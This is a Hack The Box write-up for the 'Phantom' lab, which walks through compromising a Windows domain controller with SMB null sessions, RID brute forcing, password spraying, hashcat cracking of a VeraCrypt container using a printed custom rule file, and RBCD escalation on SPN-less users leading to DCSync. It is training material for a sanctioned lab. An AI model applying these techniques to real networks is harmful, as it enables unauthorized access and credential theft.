Phantom - Hack The Box | Exploit & Evolve

Enumeration

Nmap

Initial Nmap scan revealed SMB, LDAP, Kerberos and WinRM ports open, which indicates target is Domain Controller.

000 - nmap out

DNS Enumeration

DNS enumeration against the domain revealed the FQDN of Domain Controller.

001 - dc

SMB Enumeration

SMB Enumeration revealed NULL session is available and Public Share is accessible with it. Inside the Public share, there was an email which included base64 encoded pdf file.

002 - public share

Opening The PDF

Used ‘echo | base64 -d > welcome.pdf' and opened the pdf file which revealed the default password.

003 - defualt password

RID Brute

As NULL session was available and we could access IPC$ share with it we can apply RID Brute forcing to get a list of valid users.

004 - brute forcing RIDs to get a list of users

Exploitation

Password Spraying

Using the default password and valid user list, I brute forced and obtained valid set of credential.

005 - valid creds

SMB Enumeration

Then using the new set of credential, I enumerated SMB Shares again which revealed that the user has access to the Department Share.

006 - department shares

Encrypted .hc File

Inside the department share there was a .hc file which was a backup file. It could be opened using Veracrypt but we needed a password. So we can use hashcat to brute force and crack the password.

The lab mentions ‘Should you need to crack a hash, use a short custom wordlist based on company name & simple mutation rules commonly seen in real life passwords (e.g. year & a special character).’. So I ran below command to brute force:

hashcat -m 13721 IT_BACKUP_201123.hc phantom -r rules

The rules file was like below:

# Basic transformations
:
l
u
c
C

# Add common years at the end (2020-2025)
$2$0$2$5
$2$0$2$4
$2$0$2$3
$2$0$2$2
$2$0$2$1
$2$0$2$0

# Add years with common special characters (2020-2025)
$2$0$2$5$!
$2$0$2$4$!
$2$0$2$3$!
$2$0$2$2$!
$2$0$2$1$!
$2$0$2$0$!
$2$0$2$5$@
$2$0$2$4$@
$2$0$2$3$@
$2$0$2$2$@
$2$0$2$1$@
$2$0$2$0$@
$2$0$2$5$#
$2$0$2$4$#
$2$0$2$3$#
$2$0$2$2$#
$2$0$2$1$#
$2$0$2$0$#
$2$0$2$5$$
$2$0$2$4$$
$2$0$2$3$$
$2$0$2$2$$
$2$0$2$1$$
$2$0$2$0$$

# Capitalize first letter + years + special chars (2020-2025)
c $2$0$2$5$!
c $2$0$2$4$!
c $2$0$2$3$!
c $2$0$2$2$!
c $2$0$2$1$!
c $2$0$2$0$!

# All uppercase + years + special chars (2020-2025)
u $2$0$2$5$!
u $2$0$2$4$!
u $2$0$2$3$!
u $2$0$2$2$!
u $2$0$2$1$!
u $2$0$2$0$!

# Prepend special characters (2020-2025)
^! $2$0$2$5
^@ $2$0$2$5
^# $2$0$2$5
^$ $2$0$2$5

# Common number substitutions (leet speak) (2020-2025)
so0 $2$0$2$5$!
so0 $2$0$2$4$!
so0 $2$0$2$3$!
so0 $2$0$2$2$!
so0 $2$0$2$1$!
so0 $2$0$2$0$!

# Replace 'a' with '@' (2020-2025)
sa@ $2$0$2$5$!
sa@ $2$0$2$4$!
sa@ $2$0$2$3$!
sa@ $2$0$2$2$!

# Replace 'a' with '4' (2020-2025)
sa4 $2$0$2$5$!
sa4 $2$0$2$4$!
sa4 $2$0$2$3$!
sa4 $2$0$2$2$!
sa4 $2$0$2$1$!
sa4 $2$0$2$0$!

# Multiple leet substitutions (a->4, o->0) (2020-2025)
sa4 so0 $2$0$2$5$!
sa4 so0 $2$0$2$4$!
sa4 so0 $2$0$2$3$!
sa4 so0 $2$0$2$2$!
sa4 so0 $2$0$2$1$!
sa4 so0 $2$0$2$0$!

# Capitalize first + leet substitutions (2020-2025)
c sa4 so0 $2$0$2$5$!
c sa4 so0 $2$0$2$4$!
c sa4 so0 $2$0$2$3$!
c sa4 so0 $2$0$2$2$!
c sa4 so0 $2$0$2$1$!
c sa4 so0 $2$0$2$0$!

# Multiple special characters (2020-2025)
$2$0$2$5$!$!
$2$0$2$4$!$!
$2$0$2$3$!$!
$2$0$2$5$@$!
$2$0$2$4$@$!
$2$0$2$3$@$!
$2$0$2$5$#$!
$2$0$2$4$#$!
$2$0$2$3$#$!

# Years in the middle with special chars at end (2020-2025)
$2$0 $2$5 $!
$2$0 $2$4 $!
$2$0 $2$3 $!
$2$0 $2$2 $!
$2$0 $2$1 $!
$2$0 $2$0 $!

# Short years (last two digits) (20-25)
$2$5$!
$2$4$!
$2$3$!
$2$2$!
$2$1$!
$2$0$!

# Combinations with multiple transformations (2020-2025)
c sa@ $2$0$2$5$!
c so0 $2$0$2$5$!
u sa@ $2$0$2$5$!
u so0 $2$0$2$5$!
c sa4 $2$0$2$5$!
c sa4 $2$0$2$4$!
u sa4 so0 $2$0$2$5$!
u sa4 so0 $2$0$2$4$!

Then the password was cracked.

009 - cracked

We can now mount this file with Veracrypt.

010 - veracrypt

Inside the mount there were backup files, some sql files and some config files. At first I found etc/shadow file and brute forced it but it did not reveal anything. SQL files also did not revealed anything useful. However, one of the config files revealed a password:

011 - config boot

Tested the password but it did not work for the user. So sprayed the password against valid user list and found a set of valid credential.

012 - svc account

User Flag

User flag was obtained.

013 - user flag

Privilege Escalation

BloodHound

After obtaining the user, ran bloodhound to check for privilege escalation paths.

014 - bloodhound

RBCD on SPN-less users

The path was straight forward. Current user can change passwords of three users which has AddAllowedToAct priviliges over DomainController. So we can change the password of a user then apply RBCD privilege escalation techniques.

015 - force change passw

016 - allowed to act

However, there was a problem. Users did not have permission to add machine account to domain. I tested it with all users after changing their password, and the machine quota was 0.

017 - Update password

So we can not create a machine account. After some research I found a technique that uses SPN-less users to apply RBCD privilege escalation technique. However, this technique breaks the user so normal user will not have access to the account.

For more information about RBCD on SPN-less users you can read this blog from Hacker Recipes.

018 - RBCD on SPN-less users

Got the Admin

By applying the steps from the post, we got the domain admin.

019 - got it

We can also apply DCSync.

020 - dcsync

Pwned

The machine was compromised.

021 - pwned

Certified - Hack The Box

Busqueda - Hack The Box